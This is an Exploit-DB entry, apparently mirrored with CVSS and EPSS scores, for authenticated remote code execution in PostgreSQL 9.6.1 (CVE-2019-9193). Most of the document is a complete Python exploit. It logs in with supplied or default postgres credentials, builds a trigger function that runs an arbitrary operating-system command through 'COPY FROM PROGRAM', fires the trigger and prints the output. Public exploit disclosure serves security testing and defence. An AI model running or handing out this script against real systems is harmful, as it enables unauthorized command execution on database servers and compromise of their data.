PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

2023-04-0500:00:00

Paulo Trindade

www.exploit-db.com

345

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

JSON

# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019–9193

#!/usr/bin/python3 

import sys
import psycopg2
import argparse


def parseArgs():
    parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
    args = parser.parse_args()
    return args

def main():
	try:

		# Variables
		RHOST = args.ip
		RPORT = args.port
		USER = args.user
		PASS = args.password

		print(f"\r\n[+] Connect to PostgreSQL - {RHOST}")
		con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS)

		if (args.command):
			exploit(con)
		else:
			print ("[!] Add argument -c [COMMAND] to execute system commands")

	except psycopg2.OperationalError as e:
		print("Error")
		print ("\r\n[-] Failed to connect with PostgreSQL")
		exit()

def exploit(con):
	cur = con.cursor()

	CMD = args.command

	try:
		print('[*] Running\n')
		cur.execute("DROP TABLE IF EXISTS triggeroffsec;")
		cur.execute("DROP FUNCTION triggeroffsecexeccmd() cascade;")
		cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;")
		cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd on triggeroffsecsource;")

		cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);")

		cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd()
					RETURNS TRIGGER
					LANGUAGE plpgsql
					AS $BODY$
					BEGIN
		    			COPY triggeroffsec (cmdout) FROM PROGRAM %s;
		    			RETURN NULL;
					END;
					$BODY$;
					""",[CMD,]
					)

		cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);")

		cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd
				    AFTER INSERT
				    ON triggeroffsecsource
				    FOR EACH STATEMENT
				    EXECUTE PROCEDURE triggeroffsecexeccmd();
				    """)

		cur.execute("INSERT INTO triggeroffsecsource VALUES (2);")

		cur.execute("TABLE triggeroffsec;")

		con.commit()

		returncmd = cur.fetchall()
		for result in returncmd:
			print(result)

	except (Exception, psycopg2.DatabaseError) as error:
	 	print(error)


	finally:
		if con is not None:
			con.close()
			#print("Closed connection")

if __name__ == "__main__":
    args = parseArgs()
    main()